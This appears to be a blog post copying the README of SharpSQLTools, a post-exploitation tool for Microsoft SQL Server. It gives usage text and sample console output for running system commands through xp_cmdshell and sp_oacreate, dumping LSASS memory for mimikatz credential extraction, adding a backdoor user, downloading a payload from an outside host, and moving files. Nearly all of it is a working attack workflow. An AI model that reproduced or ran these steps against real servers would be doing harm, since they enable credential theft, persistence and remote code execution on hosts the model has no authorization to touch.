SharpSQLTools – Tools For Upload And Download files

Stella Sebastian
Posted by Stella Sebastian January 29, 2021

superior_hosting_service

sharpSQLTools
sharpSQLTools

SharpSQLTools and @RcoIl are small tools that can upload and download files, xp_cmdshell and sp_oacreate execute command echo and clr load assembly to perform corresponding operations.

Introduction

And RcoIl write with gadgets, you can upload and download files, xp_cmdshell with sp_oacreate double echo and clr loading assemblies perform the corresponding operations. Refer to mssqlproxy for the function . As C# does not know how to obtain the socket for SQL connection, the mssqlproxy function in this project has not yet been implemented. In addition, Clr is not suitable for some operations related to thread processes.

The compilation environment is net 4.0

Blow a wave of RcoIl , follow RcoIl and learn C# with the boss ! ! !

Usage

>SharpSQLTools.exe

   _____ _                      _____  ____  _   _______          _
  / ____| |                    / ____|/ __ \| | |__   __|        | |
 | (___ | |__   __ _ _ __ _ __| (___ | |  | | |    | | ___   ___ | |___
  \___ \| '_ \ / _` | '__| '_ \\___ \| |  | | |    | |/ _ \ / _ \| / __|
  ____) | | | | (_| | |  | |_) |___) | |__| | |____| | (_) | (_) | \__ \
 |_____/|_| |_|\__,_|_|  | .__/_____/ \___\_\______|_|\___/ \___/|_|___/
                         | |
                         |_|
                                                    by Rcoil & Uknow

Usage:

SharpSQLTools target username password                   - interactive console
SharpSQLTools target username password module command    - non-interactive console

Module:

enable_xp_cmdshell         - you know what it means
disable_xp_cmdshell        - you know what it means
xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
sp_oacreate {cmd}          - executes cmd using sp_oacreate
enable_ole                 - you know what it means
disable_ole                - you know what it means
upload {local} {remote}    - upload a local file to a remote path (OLE required)
download {remote} {local}  - download a remote file to a local path
enable_clr                 - you know what it means
disable_clr                - you know what it means
install_clr                - create assembly and procedure
uninstall_clr              - drop clr
clr_dumplsass              - dumplsass by clr
clr_adduser {user} {pass}  - add user by clr
clr_download {url} {path}  - download file from url by clr
exit

Features

Support interactive mode and non-interactive mode, interactive mode directly follow the target, user name and password. Non-interactive mode directly follows modules and commands.

SharpSQLTools target username password                   - interactive console
SharpSQLTools target username password module command    - non-interactive console

xp_cmdshell execute command

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX xp_cmdshell whoami
[*] Database connection is successful!

nt authority\system

sp_oacreate execute command

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX sp_oacreate whoami
[*] Database connection is successful!
[+] c:\windows\system32\cmd.exe /c whoami > C:\Users\Public\Downloads\1611131759069.txt
[+] Reading C:\Users\Public\Downloads\1611131759069.txt

nt authority\system

[+] Deleting C:\Users\Public\Downloads\1611131759069.txt

clr_dumplsass

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_dumplsass
[*] Database connection is successful!

[*] Dumping lsass (488) to C:\Windows\Temp\debug488.out
[+] Dump successful!

[*] Compressing C:\Windows\Temp\debug488.out to C:\Windows\Temp\debug488.bin gzip file
[X] Output file 'C:\Windows\Temp\debug488.bin' already exists, removing
[*] Deleting C:\Windows\Temp\debug488.out

[+] Dumping completed. Rename file to "debug488.gz" to decompress.

[*] Operating System : Windows Server 2008 R2 Standard
[*] Architecture     : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch

clr_adduser

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_adduser test1234 1qaz@WSX
[*] Database connection is successful!
[*] Adding User success
[*] Adding Group Member success

clr_download

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_download "http://192.168.28.185:8001/clac.bin" "c:\Users\Public\Downloads\test.bin"
[*] Database connection is successful!
[*] Download success

upload

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX upload C:\Users\Pentest\Desktop\test\usc.exe c:\Users\Public\Downloads\11.exe
[*] Database connection is successful!
[*] Uploading 'C:\Users\Pentest\Desktop\test\usc.exe' to 'c:\Users\Public\Downloads\11.exe'...
[+] 7-1 Upload completed
[+] 7-2 Upload completed
[+] 7-3 Upload completed
[+] 7-4 Upload completed
[+] 7-5 Upload completed
[+] 7-6 Upload completed
[+] 7-7 Upload completed
[+] copy /b c:\Users\Public\Downloads\11.exe_x.config_txt c:\Users\Public\Downloads\11.exe
[+] del c:\Users\Public\Downloads\*.config_txt
[*] 'C:\Users\Pentest\Desktop\test\usc.exe' Upload completed

download

λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX download c:\Users\Public\Downloads\t.txt C:\Users\Pentest\Desktop\test\t.txt
[*] Database connection is successful!
[*] Downloading 'c:\Users\Public\Downloads\t.txt' to 'C:\Users\Pentest\Desktop\test\t.txt'...
[*] 'c:\Users\Public\Downloads\t.txt' Download completed
Dwonload
MSSQLProxy

Tags: